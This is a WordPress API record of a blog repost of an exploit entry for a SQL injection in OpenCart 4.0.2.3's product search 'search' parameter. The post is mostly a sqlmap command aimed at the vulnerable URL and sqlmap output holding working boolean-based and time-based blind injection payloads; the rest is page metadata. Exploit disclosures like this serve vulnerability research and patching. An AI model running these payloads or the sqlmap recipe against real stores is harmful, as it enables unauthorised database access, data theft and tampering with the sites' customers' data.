{"id":55805,"date":"2024-04-03T02:19:40","date_gmt":"2024-04-02T22:19:40","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177872\/opencartcore4023-sql.txt"},"modified":"2024-04-03T02:19:40","modified_gmt":"2024-04-02T22:19:40","slug":"opencart-core-4-0-2-3-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/opencart-core-4-0-2-3-sql-injection\/","title":{"rendered":"OpenCart Core 4.0.2.3 SQL Injection"},"content":{"rendered":"<pre><code># Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi<br># Date: 2024-04-2<br># Exploit Author: Saud Alenazi<br># Vendor Homepage: https:\/\/www.opencart.com\/<br># Software Link: https:\/\/github.com\/opencart\/opencart\/releases<br># Version: 4.0.2.3<br># Tested on: XAMPP, Linux<br># Contact: https:\/\/twitter.com\/dmaral3noz<br>* Description :<br>Opencart allows SQL Injection via parameter 'search' in \/index.php?route=product\/search&amp;search=.<br>Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.<br>* Steps to Reproduce :<br>- Go to : http:\/\/127.0.0.1\/index.php?route=product\/search&amp;search=test<br>- New Use command Sqlmap : sqlmap -u \"http:\/\/127.0.0.1\/index.php?route=product\/search&amp;search=#1\" --level=5 --risk=3 -p search --dbs<br>===========<br>Output :<br>Parameter: search (GET)<br>Type: boolean-based blind<br>Title: AND boolean-based blind - WHERE or HAVING clause<br>Payload: route=product\/search&amp;search=') AND 2427=2427-- drCa<br>Type: time-based blind<br>Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br>Payload: route=product\/search&amp;search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: OpenCart Core 4.0.2.3 &#8211; &#8216;search&#8217; SQLi# Date: 2024-04-2# Exploit Author: Saud Alenazi# Vendor Homepage: https:\/\/www.opencart.com\/# Software Link: https:\/\/github.com\/opencart\/opencart\/releases# Version: 4.0.2.3# Tested on: XAMPP, Linux# Contact: https:\/\/twitter.com\/dmaral3noz* Description :Opencart allows SQL Injection via parameter &#8216;search&#8217; in \/index.php?route=product\/search&amp;search=.Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55805","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55805","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55805"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55805\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55805"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55805"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55805"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}